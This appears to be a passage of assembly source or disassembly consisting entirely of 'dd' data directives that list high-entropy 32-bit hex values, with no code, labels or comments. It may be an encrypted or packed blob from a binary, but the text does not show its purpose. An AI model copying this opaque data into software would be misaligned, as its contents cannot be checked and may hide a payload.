dd 43A52C05h, 3BBB53E9h, 14CFD014h, 0FBDEBE85h, 45003939h
dd 797D119h, 8137539Dh, 87E376DFh, 0E153CBE6h, 57CD44F1h
dd 0CA01331Dh, 238EB589h, 1BEC4EC4h, 19DAE8F5h, 56AD1AFBh
dd 669228E9h, 84772DF4h, 4EC17FC6h, 0EB2A6474h, 0BF79C59Bh
dd 0F975121Bh, 9E3D489h, 1CF6DED2h, 0ACAEC5C5h, 46D166E4h
dd 0E09549BBh, 6935766Ah, 0A3DA17F0h, 0BA57D868h, 718F3BD1h
dd 20F677B2h, 23710509h, 4ED7CDD5h, 96689FF1h, 0DF115375h
dd 237E2B00h, 0E56C8BF9h, 855617Bh, 13B891A2h, 791F7BF9h
dd 6071F6E9h, 0C7D29025h, 0BBCFEAE3h, 254684A1h, 59773612h
dd 0D775038Bh, 0DCBD0C3Ch, 0E703C1DDh, 0F58F44E4h, 6BBDF48Ah
dd 60162877h, 2348E9D4h, 9C17565Dh, 2C767E74h, 0DA56FEB7h
dd 1A07A73Fh, 7F12B475h, 0DA9B2D8h, 434EBA45h, 0A2AA1DB1h
dd 986BAE93h, 0EA687D6Dh, 389AE5FDh, 0B8D1DFB6h, 0B2D113E3h
dd 0EEA52ED5h, 31A8EE07h, 0EFC19E6Ch, 2465FCF8h, 8BE478D2h
dd 0EC764411h, 0AB57387Eh, 23D4A84Eh, 2C4E70F1h, 743B125Ch
dd 0FB8BEB4Eh, 568C6E88h, 6DF6BF61h, 199FE5C0h, 0A7F5E17Dh
dd 4DB3756Eh, 8DAB91ADh, 0E7E09FE3h, 0DDF314BBh, 68A8737Eh
dd 7CF5C01Bh, 2FCA7F58h, 9731CECEh, 57A1D2F6h, 0A6BFC9D6h
dd 0A6C2B445h, 0A5736AC6h, 0F455C41Ch, 0E0647DD3h, 4F797F86h
dd 0AC147D7h, 0AAFB4485h, 2D3057E9h, 13BDA4DFh, 3431D633h
dd 87D87327h, 331AB0A4h, 0DB2C2979h, 0A0497330h, 50FC7D11h
dd 0DF1E9B59h, 6D775A0Dh, 0AAEAAD82h, 9F2BB3BFh, 0C24968C3h
dd 2AAC2A9Ah, 281EFA0Bh, 0EF9E369Dh, 0E1F8A168h, 0F1C9333Ch
dd 6C0F2335h, 80F7AE36h, 549DE48Fh, 0D628D457h, 4F231AB3h
dd 495018E9h, 0D125220Ch, 0C69459F6h, 0B1E779B1h, 0B592FE18h
dd 32D1610Bh, 189C6B32h, 358B8AF7h, 0E12450B1h, 0BD92FC5Ch
dd 4AA4EB4Ah, 0B01CE661h, 7812FA3Eh, 0D1F84298h, 657B1E71h
dd 50133F74h, 0EAF9FE3Ch, 5A573D55h, 7C9DBEF8h, 0DD267308h
dd 1E9BAEB8h, 91ABA9D5h, 67B882C1h, 36FCA367h, 0FFD0B86Fh
dd 0D9DC8169h, 952228C7h, 0E54145E0h, 26BEC4A1h, 0F80A17BDh
dd 56882E1h, 84569123h, 0C1216496h, 0CC9DC6BBh, 8BBC50C0h
dd 8AD4EA0Fh, 0FB429689h, 363160FCh, 0E84ED54Dh, 8B919F7Dh
dd 7B0E7F64h, 1A030257h, 7C234556h, 0BC4F0C73h, 17DD6D2Bh
dd 9F05031Bh, 754F759Dh, 0C66472A0h, 7B448DA5h, 0B07676B0h
dd 0BE272FE9h, 82FAC268h, 0FE91AB6Fh, 0B8368DAFh, 0DC62F0D7h
dd 0A15C8420h, 0AF16DD39h, 1B86159Ch, 1FA5551Ch, 5D324910h
dd 0E3C0492Bh, 0CDE6360Bh, 0A0CBB878h, 605EA5ABh, 3315DB66h
dd 0F95C6D1Fh, 1F087DD2h, 0F66BEE02h, 0A639E3BAh, 0E6E7FD52h
dd 0C12BA386h, 7072381Eh, 5733F1D9h, 8A97F94Bh, 761962E1h
dd 235DD025h, 0A1BD57F0h, 3E7D4F5Fh, 0E4A20D73h, 2FD1DCA8h
dd 0A037F9EFh, 91E0E6B3h, 0D59C482Fh, 0A20F89ADh, 0FD028777h
dd 204B3ABEh, 7F5CCB6Bh, 0BFD815AFh, 655B38BFh, 208709CEh
dd 0E960ABCDh, 54C62480h, 28B009E7h, 5F4326A0h, 0E9A37CF5h
dd 0F4764EFEh, 0E1DD69E4h, 0A2C83FDDh, 45C14BC9h, 142F68B3h
dd 5EB35B07h, 44D2C3A5h, 0C2654BFCh, 0EC120C06h, 415081B1h
dd 716A82AAh, 0B2BA60FCh, 0F5157A25h, 67962F5Bh, 0AEDD397Ch
dd 0B5A3028Dh, 2A4EEE87h, 2A5AB099h, 0DC0F8A5Fh, 6DBC7D2Bh
dd 0C63A35F8h, 83FB9CB5h, 82B0B885h, 125FC5A4h, 0C0C78117h
dd 0A9A4015Dh, 0B6621F8Dh, 0BB1B049Eh, 0BEBFEB2Ch, 0D0F07871h
dd 635FBA65h, 95D7CBABh, 792D6EB3h, 71C5B258h, 96916EEEh
dd 0BF133055h, 0CE25B56Bh, 0AD6A5637h, 68DEEC4Ah, 0C4C55FB0h
dd 83EB26A1h, 0DA7F0D53h, 414C0C75h, 1AE39439h, 86EF3B7Ah
dd 5E1271ACh, 54F5DD43h, 88FFA21Eh, 77537C77h, 186F82BBh
dd 60294AEAh, 62E12DBFh, 3B8FA54Ah, 0D1B7B970h, 64E09BE0h
dd 0AE2FE994h, 928F20D3h, 0DAF72AEDh, 0E0F7B30Bh, 688E2ABFh
dd 47277308h, 0AD2E4115h, 0DB05EC3Eh, 8D1B772Eh, 0C5D0248Bh
dd 0CA58EBD5h, 67FF01DDh, 0CC15557Ch, 1452AF6Eh, 74630086h
dd 0C3F373B8h, 3360E069h, 726AA5A9h, 33FF3BBDh, 5E094AB8h
dd 115C145Ch, 190C73Bh, 49DDC381h, 0A3A280EDh, 7240D0DDh
dd 0E611B3D0h, 0AC0979BFh, 8B1D6871h, 4A812AEDh, 6147149Bh
dd 45B76EF2h, 0E4EC72AEh, 53F368BFh, 6B9A21BEh, 0E557520Dh
dd 8063B1C7h, 29EC822Ah, 9CC86150h, 0DDBB5555h, 0D16089BFh
dd 0E97E8FBCh, 7E02A606h, 71505552h, 5133F3E8h, 7E1E2F78h
dd 1B7CAAECh, 0F44D11ADh, 9025E191h, 0F0ECCE2Ah, 0A48B5A24h
dd 5B29BF1Dh, 0DDB848C2h, 173B666Dh, 0D91AF268h, 5DFAD098h
dd 58EA6A37h, 191ABC7Ah, 0D85F83D9h, 0BDCA3F0Eh, 6AB642B4h
dd 0EC728E1Ah, 0DB4AE00Ah, 0D563B515h, 7A2DAACAh, 0BE363773h
dd 1BA15571h, 54A85A21h, 79CAF4B5h, 0F20EE4F8h, 383E58D4h
dd 8FA64D6Bh, 39BB887Eh, 2F152C53h, 5D20ABA9h, 0E8D64B6Dh
dd 7975BBBBh, 1B04C13Dh, 75451CEEh, 625AFB45h, 0D791C5ECh
dd 8834CCABh, 0ED7AA7A1h, 0EF39D02Dh, 2D1ABFA5h, 0F4AABD36h
dd 4EBAFE45h, 0F24AA356h, 5FE0E2D1h, 6CCE441Dh, 0BC52EFA3h
dd 0D27306B2h, 0AF5585C5h, 0C223C1h, 0E11581BAh, 0E9156525h
dd 709A17E2h, 1F83C8DFh, 0D63395FDh, 0B92DFC95h, 0F798F311h
dd 0D50388CDh, 0FDA49B9Fh, 0B2C59D71h, 76CCB551h, 17DEB595h
dd 0EF9D6D2Ah, 4ED5D4FAh, 5C73C175h, 0E35961A5h, 0F815DD09h
dd 0AC7C0F8Bh, 6894EF95h, 0FB81A3F8h, 77D6A54Ah, 875147AAh
dd 0AD9CB47Ch, 235328FDh, 7B03F698h, 62E519B2h, 0FE6BFD2Bh
dd 15D44B3Bh, 0DA91F784h, 93E7AD8Bh, 5DD2C040h, 954A7147h
dd 83ED2A5Dh, 0D1448475h, 0DC764B32h, 9607365Ch, 0E395BD2h
dd 0BB8BA921h, 8F719E42h, 0AFF624AAh, 0D395A7AAh, 7F0ED11Ah
dd 9673EA0Fh, 0EE749C89h, 4FEDA14Fh, 5E167753h, 51C73D54h
dd 15984FEFh, 644779D1h, 339B9D84h, 0BCB6D71h, 669C8286h
dd 0A7EA83E9h, 0F17C3272h, 279957Ch, 1E4D4C6Fh, 86390797h
dd 0A9ADD68h, 7753D394h, 0AB3B1337h, 0FE76B24Dh, 22636292h
dd 207CE0FAh, 0A0CA2A26h, 1143E3B5h, 0CCEED2E7h, 0A95832h
dd 25BED8E6h, 4B49EA2h, 45F212E7h, 0FAA47C8Ch, 5AE07D63h
dd 0CE607BDDh, 0ACDED722h, 5FF743BCh, 0DCAD22E9h, 0A18C2370h
dd 6DB68C5Bh, 0AA92C9ADh, 0D3A81647h, 2BF5CC12h, 11788DF8h
dd 917E366Eh, 7D0A2C09h, 1DFCA97Bh, 0FC0CED7Bh, 164574BAh
dd 470FAB12h, 0DFB625C1h, 0E4042E47h, 0B54DA39Bh, 85866C25h
dd 7F25D794h, 0A16494C7h, 0D1BCD405h, 0B8E77221h, 0B7F2B87Eh
dd 3220FA4Dh, 87D55F9Fh, 2BBBFF04h, 0A528A586h, 5EAB7916h
dd 6E7C49B0h, 92FDB00Bh, 0E55599D2h, 0D1425FEFh, 36E2E8F8h
dd 3C88F2B9h, 7D52E5D0h, 0FC3CDE20h, 0AFB14228h, 0E92DAF4Eh
dd 0BDA97771h, 0A95CA060h, 8553C93Bh, 0F590D333h, 0A15B28A6h
dd 7075A81Dh, 8E42DFF4h, 3EC9D779h, 55EE04C9h, 0FD8781F9h
dd 7DAC9DC5h, 5563A88Ah, 1E4039FFh, 6E18209Fh, 0F450F443h
dd 0FB920F36h, 16DCF9EAh
dd 0DB8B60BDh, 71B28035h, 0C2E2AC01h, 6288DA0Fh, 0F3842EB5h
dd 0DC516C59h, 0E8809E5Ah, 31375B9Bh, 441CA02Fh, 0F024ABB3h
dd 0F26DA250h, 0BE162454h, 0FE74F959h, 9FA2EB90h, 3C08BFDAh
dd 26E389EAh, 81DD9E8Bh, 0BAA2C5D4h, 0BAF05405h, 3EE7303Ch
dd 5EB97A1Fh, 38BF63ADh, 6EB37981h, 671FEB57h, 29183715h
dd 2DACFCE1h, 0FFE8CAE3h, 7B5C6C8Eh, 5A3A1B9Dh, 8E5D5872h
dd 0E8B85D60h, 0BE4ED9ACh, 0A49B43F1h, 0D11FB349h, 37F21AEFh
dd 86C2FD60h, 0D33A5AAFh, 0C8960B8Eh, 0AA1C9EBCh, 0FEBE5322h
dd 0CEDA283Ah, 8B5D0EFh, 44DE2A74h, 0B86B5B23h, 9689C134h
dd 6EF56157h, 0D26BBB38h, 0F551E12Ah, 0BAA473Ch, 11B4A9E6h
dd 1DC00AD5h, 43B44674h, 0B188FAABh, 0B68981F9h, 1FA9573Ah
dd 8ABADAE9h, 3AC643F0h, 0D6A26E46h, 87E7FC4Dh, 52EC3A4Fh
dd 649F37CCh, 0D391108Ah, 3D0F506Eh, 2B730EF7h, 42DFCFB0h
dd 0B82E8F91h, 73206BB0h, 0E7BAA382h, 70BB39FBh, 12B39E70h
dd 0FAF9C6D8h, 475636A1h, 0F822DD46h, 8E45FC9Bh, 0CE2C7B86h
dd 0A9D2A01Eh, 0E1FF39CBh, 4739FD93h, 93014A55h, 0E10C546Eh
dd 6F778D55h, 53D6EC01h, 6D7EF0A5h, 58B7E71Eh, 5F65E6C3h
dd 6887D719h, 55756156h, 8E1746B1h, 0CB1778ABh, 31302B46h
dd 0A2DA2A66h, 14742B10h, 477C7DB3h, 9C55F64Bh, 6B30EB62h
dd 7E0EF5DAh, 54EA364Ch, 5C1660EFh, 1FD6AA42h, 35BE5B0Fh
dd 0C0C33D6Bh, 0AB1F9A11h, 1F55176Fh, 87697EABh, 5475D829h
dd 2B1B9E0Fh, 0BC21BC1Ch, 85C74633h, 69E1E07Ch, 0D04EAEBBh
dd 0A5F8C7Fh, 0FFAC9F3h, 57AB936Bh, 57A8BABDh, 1F9B6CC3h
dd 85715B45h, 579176B0h, 0BCC06668h, 0DD0C5B4Bh, 9365D1C1h
dd 0BBB4BCCAh, 9F856352h, 8DDCE1A9h, 9E2AA876h, 999DAC3Fh
dd 9793C0Ah, 0F33A328Bh, 1971E960h, 7D5B1D84h, 1E02AB0Fh
dd 0B0FE74Bh, 0E4229562h, 6BB90B99h, 8DA2C466h, 43F99DF0h
dd 6157EE1Ah, 0ED1C89FAh, 3DBEAB2Ch, 100A33B8h, 98F3BC98h
dd 968AF77Ah, 0A47AB4ABh, 0BD38810Bh, 0B699D661h, 7EE75C9Eh
dd 2255B811h, 1555A252h, 6D38D840h, 57042EBDh, 7C581579h
dd 9126D1EEh, 0F1E20F9h, 0EEA6CB4Ah, 0AAE9AA98h, 99BBF0E5h
dd 0AEE52BB1h, 0D259F080h, 0AD9DF2BEh, 0E9D4B2C7h, 419FEAEBh
dd 0A3936F24h, 6BAD94A5h, 40E3A0A7h, 28A27301h, 7CE597Eh
dd 284029F6h, 59C1A6D1h, 0AFB7BE47h, 357FA7EAh, 7DDBA8FCh
dd 62204EA3h, 7B64AF8Fh, 2F552B45h, 0BA131FA0h, 3BF06953h
dd 0CF41FBCBh, 351B18B7h, 114C44E9h, 6121F8DDh, 3EBD6469h
dd 7D9AA5FEh, 5B5837B4h, 0A7CE7BF0h, 3CACB78Ch, 0BE7B1308h
dd 0F4CD533h, 4F805776h, 58406DABh, 4A38D073h, 7247E3Ch
dd 0BFE55B38h, 0EF743DDBh, 0F5C746A3h, 4FAA1688h, 24A745CBh
dd 4B07E2A9h, 9CC37B1Ah, 41AFC4D5h, 0D165AD14h, 0FA812CC0h
dd 607C7113h, 584D00BFh, 0E7F971C3h, 45C1DB99h, 0C75C28BAh
dd 0F5A575EEh, 9A40B6B3h, 22EFDF7h, 0DCC4AADh, 8DEA57Dh
dd 0BDEC7DFFh, 16BE98C6h, 9BA5BAF8h, 0AFDD094Fh, 53BCC139h
dd 4612DC52h, 0BDD63E56h, 7C3AFBFh, 7B6290FCh, 4EB234ABh
dd 0F9127F33h, 9CCE0844h, 0FCA8CAA4h, 53665F6Dh, 96CF415Ah
dd 0A8E8EFB8h, 1AA4AB36h, 88AD0E89h, 51574723h, 5FB9AF50h
dd 90C956EAh, 0F53030F2h, 7136BAB0h, 9DD6C9F8h, 64829219h
dd 0D1FBDBADh, 112E4873h, 0CFBA6A11h, 193930B2h, 707DD1A0h
dd 39B11752h, 139FD254h, 2CE7B7Ch, 0E50778FEh, 0DA4E1AF4h
dd 5BECA566h, 0CA604ABFh, 7A0D0B6Ch, 0AFE11BFEh, 7694B6B4h
dd 0CC0F4BF7h, 3CF25557h, 542DB634h, 63DF7C05h, 322D40CEh
dd 0DA3F3B41h, 0ABC4711Ch, 8D4C2446h, 0C08DEEBFh, 0ABB836F2h
dd 92B85BFAh, 0BAF9DFA0h, 26CD344Fh, 0AA0E2016h, 0F46E8EB9h
dd 4128124Dh, 302ECDD3h, 0AE532B7Bh, 0AACD9849h, 0E2E8607Dh
dd 0B823BEFEh, 148DD689h, 8C7BA1F8h, 0D6E0471h, 0FCB575FDh
dd 1A1CE85Ah, 932E7F75h, 40A45FD1h, 0A1BF749Bh, 469BB226h
dd 772812EAh, 28D8957Fh, 0A96552F6h, 0B1AA69DAh, 2FC3810Dh
dd 4F843E80h, 1D5EF72Eh, 9A34A35Eh, 31799953h, 0B51ACFEEh
dd 51415B6Ah, 0A1ABA8A8h, 0E3501ECEh, 0B857FF6Dh, 8515CCD4h
dd 0EA5D57CDh, 0C80BFB74h, 77560B4Ah, 85A5B751h, 0F856F54Fh
dd 303F5373h, 898F5A16h, 0BE6154DCh, 5D6E66BAh, 0BDD56079h
dd 792846CBh, 8A5F8791h, 0C3E1A34Fh, 0CACDCC90h, 0E2E7EA33h
dd 1A9AE235h, 4BE581EFh, 0E1B194C3h, 10BFDBC1h, 0D6DED157h
dd 0D764B82Ah, 791FAD67h, 2215055h, 0E453DB70h, 0A0BAC6A4h
dd 3EE77FF9h, 97E069B6h, 757D7848h, 9DF82D01h, 5C347C1Eh
dd 41AD123h, 0FE889F23h, 0ABAF4ABh, 626BBF8Ah, 85A09F03h
dd 1937733Eh, 97E6616Fh, 0C2B52350h, 0EF9FBD42h, 3AEA8638h
dd 0AA1F5D45h, 0EF0B0CB5h, 0E56C81BFh, 0F92150F2h, 52C99030h
dd 0FBF30960h, 0F6623954h, 85F472C3h, 0E1E0813Eh, 0E550D041h
dd 0FEBD8E1Ah, 265E05D5h, 9F12025Ah, 0E6B81166h, 8CB45A66h
dd 7F7688DEh, 45A21AB7h, 61AC923Bh, 0F454FD62h, 95A51708h
dd 0C2AA010Ah, 0AC087750h, 7F21CEE0h, 2AD5358Eh, 0CF650B19h
dd 0A7F897F9h, 59241449h, 52F97DD1h, 55F23423h, 1F986E1Ah
dd 90C5497Ch, 28ABD5Ah, 8A15B67Eh, 530FC24Ch, 9D4F51F7h
dd 0C406049Eh, 367EAAFFh, 0E32B968Fh, 0AF9C6FE8h, 0CBB90453h
dd 7CCE9754h, 7A47F850h, 2431E384h, 44DBF50Ch, 0AAA06187h
dd 0A77B57DEh, 0DB25D735h, 5AF2FDC0h, 0F17FA737h, 4E2415D7h
dd 0BD33F96Bh, 5B246FE3h, 0B3FE08D8h, 0E904BF0h, 0D7FC0FBFh
dd 0ABF7AC7Eh, 0BF1ED59h, 9CDAEE84h, 62AA32D7h, 0DB168F6Eh
dd 957768ABh, 1C859428h, 3564EB9Fh, 8CDE1A5Eh, 0AA96476Eh
dd 0F1C71D08h, 21AF85EAh, 77E77D08h, 0AC72AFF0h, 1B72386Ah
dd 0EEC348B2h, 0C27B7AD5h, 0DB4672C7h, 0E796A995h, 1B98EC9Dh
dd 112D87C4h, 0C655CBEh, 39A0E0E3h, 6BAAB015h, 0D3B93D05h
dd 0D5169B87h, 55B417E3h, 344B6E64h, 6BE27D1Dh, 0B92319E2h
dd 0B531F9DEh, 0A0A0E254h, 0D75F0C20h, 55FBEAD4h, 0A2215D9h
dd 8F01DA80h, 9360164Ch, 97F12FA6h, 5F5044CAh, 60D8B413h
dd 0CA84E51Ah, 976DE0FAh, 0A05F72BCh, 483C9B64h, 0B5F5EDC6h
dd 0D17C0AEBh, 7E0AA824h, 0A75F5ADBh, 667E8D37h, 0E8DA2C3Bh
dd 0B0C3EB55h, 9FDCC42Ah, 125C1746h, 0B12B5DA6h, 0DBC1C0ECh
dd 42DDE28Ah, 0C9D75A0Eh, 0C1DF0057h, 813B39C1h, 0F0454097h
dd 6F367F78h, 225DDED5h, 0CAF4BD64h, 23C142D7h, 0CA942F8Dh
dd 7D33BA06h, 0E826FDDCh, 0CE51C648h, 0FA5F1B20h, 14DD57C5h
dd 5B391CAFh, 7DFA50FCh, 7E1F84FBh, 115AD9FDh, 6FDE5FD1h
dd 6D9798B1h, 17FC637Dh, 3BE2761Eh, 0DE754C29h, 5752C4A6h
dd 7953271Ah, 94402AAAh, 0AAD474F2h, 0AF0FC176h, 0BAEAE98Ah
dd 0DEB88707h, 0C5065541h, 9EE6BB33h, 0DC3F881Fh, 0F45AE37h
dd 9FE628C4h, 0D53C42ABh, 9C08FDD6h, 70F39DCBh, 3529D4ADh
dd 0B29728AEh, 0D0136A1Ah, 639C293Eh, 2BFDC6C5h, 0C4A66657h
dd 32A45E1h, 0D10804CEh, 2DAB2199h, 514B2D73h, 0F5BEAB45h
dd 67115A2h, 382A7474h, 578E9355h, 161E9F6Fh, 8E2F9FE9h
dd 0CF2BC10h, 0BA6D5B60h, 950F8F94h, 0E0221BADh, 622F4EA6h
dd 7DFDAAE0h, 3F6FAB40h, 91377ED9h, 6F077386h, 0AEACFB98h
dd 1B8BAD64h, 16F773BCh
dd 1EC8C17Fh, 0B45ABF7Eh, 0E040F8C2h, 1DB9E6C3h, 0F13FCB9Bh
dd 0EB96EDF2h, 0A2CD323Ch, 2B446A66h, 1E7F9B3Ch, 8FF58BA6h
dd 913DFD2Ch, 0BD434D1Fh, 53F0A2h, 26A75CBh, 109C9DB8h
dd 66CC00D7h, 2BCFAEF0h, 0F8E448AAh, 0BD5ADA99h, 39755DC6h
dd 5EFE4D81h, 2BED3968h, 16056FA2h, 9F42A12Dh, 0F5A3253Eh
dd 7EE4B974h, 7AAE078Dh, 399F3F7h, 0B625C50h, 0BAB4ECD7h
dd 7F832B47h, 127387F0h, 2E8AC4FEh, 0E97EC129h, 2E62B55Bh
dd 3552D69Dh, 0CBD5AE25h, 0D58AEE6Ch, 0DC60ACC8h, 9D4F429Fh
dd 0E9DFAFBAh, 85E94191h, 0E07E395Ah, 440B3DC1h, 251A3452h
dd 0F54D4F5h, 5665CDC4h, 0A9AC4971h, 65B4934Fh, 4A7E1230h
dd 749D7292h, 7821EADh, 54C1C968h, 0FD3BECECh, 9A6CAC3Fh
dd 1F1D604h, 0FFD66968h, 0B4C4E839h, 0A59268C5h, 771B2242h
dd 7511E146h, 0DDD2F6D4h, 0F8AB1BE0h, 7DED4F57h, 1628FB6Ah
dd 968B256Ch, 3BFE5813h, 766E0D2Fh, 36E3094Ch, 0DC4AE801h
dd 0B177EEF5h, 0A48FFE01h, 0B7665581h, 0F7B47922h, 0C839297Ah
dd 0DA20E87Fh, 908DAA80h, 0D55557D9h, 2AA86E40h, 56E7855Eh
dd 745156E3h, 6E0CCE1Fh, 8DF55DD0h, 91FE80D6h, 0AF540D8Ch
dd 2DB9A5DAh, 774C5EBCh, 21B2CC62h, 0C887CA47h, 3EE95E9Dh
dd 0C1EB2E76h, 5B297D82h, 9323C88Dh, 0F5DC7B95h, 0EB752098h
dd 8469CE8Bh, 131101D3h, 0D3B87E3Eh, 53D51F1Eh, 0B7A1D54Bh
dd 8CA45C02h, 1F550768h, 94E9EF52h, 0F5D0EA38h, 0BE528695h
dd 0A211ABA4h, 5F160FA2h, 0BFE8F470h, 1767D857h, 0F953B77Ah
dd 8AB62FE4h, 6B51992h, 5FE98888h, 41B00842h, 78168ECDh
dd 75442CECh, 3AB18152h, 3FE6EF57h, 7D41F341h, 0FEE84C35h
dd 7978B46Eh, 60684E21h, 9CCB7356h, 87721B3Bh, 604ED5A4h
dd 7C1F2ACAh, 89EFB822h, 73AF6EF2h, 0C0FDD4C0h, 7D929461h
dd 5DE34BC3h, 7A55FCFCh, 0EF042F02h, 536735C5h, 0F73EFC07h
dd 643CE61Fh, 567B6E93h, 0F87268FBh, 9185650Bh, 0E72070AEh
dd 0C0F1F132h, 883F64ACh, 5CD3E4FAh, 67548822h, 90480D53h
dd 0A25E46EBh, 662028FCh, 54583094h, 2B6B7B35h, 0C740BEA0h
dd 627B2074h, 25F34EDAh, 0FC45376Fh, 38029AA0h, 3D77B68Bh
dd 0BA4CA54Bh, 0A12EBD81h, 0EE9FBB68h, 0C7DBF391h, 1578AC9Bh
dd 0E5B6868Bh, 0F1A311C8h, 443D2DEEh, 99779DC5h, 6E530901h
dd 0C90A9AAAh, 98E63FE6h, 0FDF9702Bh, 74184644h, 6331DDFh
dd 37B4BFA2h, 0C16DE865h, 1E12247Eh, 925C4F26h, 3786EDAAh
dd 6256F10h, 338A9C6h, 410E0928h, 4AFAA17Dh, 69CDBB75h
dd 0A78F5168h, 8DABE8C4h, 998C1607h, 9599A5FEh, 336FA61Ch
dd 468008BEh, 0DF343F07h, 19CFAC21h, 42D6F8A9h, 0BFDC4861h
dd 7AEEF0FCh, 414D4010h, 28EA4AFCh, 0F71BCA5Fh, 0B3F1ADCh
dd 1C9F7CCDh, 0EE740F38h, 0B8E43F0Dh, 15D534E3h, 543411BEh
dd 806F4278h, 6A269809h, 858372D3h, 0A46A8DECh, 0ACCAE0AEh
dd 0AD109F0Ch, 0DC631CA0h, 48FFE2FDh, 0D5D3E72Dh, 119994D8h
dd 0AADF67BFh, 916FD021h, 3DE1E41Fh, 4FEB3FE2h, 6B625FBFh
dd 12FDA42Eh, 0D1E7899Ch, 0AA8DA78Bh, 0E70CF5F0h, 90C765B9h
dd 33C5370Ah, 27B2AD83h, 5DDC896Eh, 0D6AD107h, 0F14FAC4Eh
dd 0A269DD89h, 0E9B7E5FDh, 0F65CD4DFh, 3E5F9FF0h, 0FACD37AAh
dd 5090AE6Dh, 0E80EB78h, 618021B4h, 4AB3560Bh, 8CADF9DEh
dd 9FE35F6Bh, 3133ECEh, 8D95B10Dh, 0CFA3806Fh, 0C56BD73Fh
dd 8088EA8Ch, 0A9DB56C4h, 0B5DF555Fh, 1592D1F8h, 0CA4E69CFh
dd 0ADFC6636h, 0D6BE0A10h, 0B43D5B8Ch, 54881A67h, 0B2B5780Dh
dd 1D1205E7h, 0CACCAACCh, 0ED7ACE70h, 0D5F5BAD9h, 7D7137F8h
dd 2E72FAA0h, 0E4ECFF11h, 0B9B2E548h, 4D267B8h, 0D42AC2C8h
dd 99C1E046h, 0DDD3114Bh, 6C154752h, 0FFBEFF79h, 177E3CABh
dd 0CBA0219Eh, 0B62A635Fh, 7B0CCFFAh, 3BE5B70h, 8E5C76C8h
dd 42FE6BFEh, 2E5B1B42h, 0BACDBF65h, 56213913h, 8B7D81E5h
dd 0E37BEFBEh, 0EDA76A3Fh, 0A56168Ch, 72363FF5h, 59E8F04Fh
dd 0E0A5D765h, 92AE4D7Eh, 99E6260Ah, 359CC55Ah, 0D154D87Fh
dd 0BF0349E6h, 35559D43h, 0FEFC65DDh, 0B49BF769h, 57FB7AD1h
dd 0AA5A21Dh, 0B86C16A0h, 63A95E05h, 0D408CF55h, 0B72FA7EEh
dd 2EA14396h, 3866B2EDh, 4B8CED23h, 7B288637h, 0B739B975h
dd 6E11DAB6h, 32120C5Fh, 0AD800ACCh, 0AFC4F92Ch, 516A692Fh
dd 42DA3904h, 31842EDDh, 5DE30BA1h, 9D46FEF0h, 6B35B5A0h
dd 0AD0E2C9Dh, 51F5CBB4h, 55DC42BAh, 99555FA0h, 5B472CACh
dd 80CF21FCh, 24B854B7h, 0FCFEBE16h, 2FC642E0h, 0B81C9BBEh
dd 0C61FDF23h, 0F9C2FBADh, 729585FEh, 788A6AF2h, 59AD62A1h
dd 4B7C2722h, 0B543CF2Eh, 0E93BF168h, 0DA756BA8h, 0BDDD5A76h
dd 8BACCE2Eh, 938DD688h, 3BB5057Dh, 9D236177h, 0BBF2C20h
dd 8D5386DBh, 0C58487E2h, 7E4EE843h, 701D50ADh, 1E4F9D8Fh
dd 13592987h, 0E0F43A07h, 562B47F7h, 0BD96AFC3h, 0D7190A54h
dd 9F18AF7Ch, 9AF840BCh, 7DFAAA47h, 9CFFDA80h, 0D73950FAh
dd 0F6E56D15h, 0ECECD77Fh, 5B59B08Bh, 9A9C59C6h, 0FEAA44ECh
dd 3F154EE6h, 3B88F58Ah, 0EFE4543Eh, 8D66975Fh, 3E52E14Bh
dd 7D705094h, 7291BDB7h, 550ED3BBh, 6A463B88h, 1CC1D835h
dd 89924479h, 0A66D1807h, 0E446A49Ch, 0D2DC5F9h, 0FDE15B03h
dd 4AD90182h, 0F9CE5A31h, 9E007799h, 0F933AFBBh, 30B2BAA7h
dd 0EB5C2A8Fh, 89F2AC4Eh, 388571A9h, 0FB080DA3h, 79EF0ABFh
dd 0B5BB03F3h, 88D72C51h, 0C91F4EB7h, 318B2ABFh, 48E46318h
dd 3BFC6E56h, 7FBBEBEh, 0E2B76D6Ch, 982110AFh, 58105DFEh
dd 6BA8D25Ch, 5C121733h, 0A2142D3Dh, 5D72E874h, 5F4E3BAEh
dd 5C04E198h, 8C03DC86h, 0F7BB4E81h, 0FD6AF68Dh, 81F9CE0Ch
dd 1A697FB3h, 7A0D68D5h, 0EBA2F81Eh, 47DF5FB6h, 8F17F476h
dd 0FE1D1F12h, 9BA48FA9h, 0C5A16757h, 0D798931Dh, 635D0662h
dd 960C5FDCh, 779DCF5h, 3E8313A8h, 0CE3FE9C1h, 24DB07C4h
dd 0D7AEADB4h, 523EC6B4h, 8B61692Ah, 0B9B4DAB8h, 8AFE6AAFh
dd 70A7353Bh, 474B3BB7h, 0A63E8385h, 0BA5FE1D3h, 97E1EFBEh
dd 55EFDAA8h, 0A8D6BB4Bh, 0B8E156B1h, 9688FE7Fh, 8BA9029Fh
dd 6FF9BD8Dh, 445FAB44h, 79A95A3h, 47FFCCDDh, 1708098Fh
dd 0BA32E40Dh, 8DA9AAA4h, 324A1FD0h, 0CC885A2Ch, 9E377881h
dd 0B70BEA1Bh, 36C316B0h, 0B375B335h, 0A8DA245h, 28975501h
dd 3495B831h, 9545FB03h, 1E86AEFAh, 724EF3BBh, 5AA32EB7h
dd 30AB7900h, 5B92DB4Ah, 0FFC12D50h, 0B44F2C1Bh, 4B7022D3h
dd 0E6F0FC17h, 3D663AD1h, 93C0D374h, 0A53F741Bh, 0ADD0DA9Dh
dd 0A65F7C8Dh, 0E7FF0164h, 12FA8DA8h, 0A9E288E2h, 28BF7574h
dd 6D249070h, 3D9F56DCh, 1795CF54h, 0F3D3D55Ch, 444F0385h
dd 0F62362E3h, 86655EECh, 0A8DE2D64h, 0A977BA3Ch, 0A6F0303Ch
dd 9B56B60Fh, 1B99FE54h, 773D5B8Fh, 5CF5E545h, 81D6744Fh
dd 83CD8F6Fh, 0F6F61FC4h, 0E594CF3Eh, 0D568DA92h, 0E19DC1EBh
dd 0D5CAC8h, 0ED4F6E4Ch, 2E2C77EFh, 3610DEAEh, 6A5B6B92h
dd 0F8F8DAEEh, 879FEAAAh, 10F46713h, 5BE3F89h, 2DE0A64Ch
dd 0FEAABE06h, 5FBC4865h, 7FA2895Ch, 95C77A6Fh, 0AC02ACC3h
dd 0AE8BE4DBh, 368DA191h, 0BFB3BDB6h, 0FEABA78Ch, 0D0E41144h
dd 0C203087Dh, 0D29D1524h, 6EAF9D69h, 6AE1CC0h, 765D1A4Fh
dd 0BF025FD8h, 0EB3B4E58h
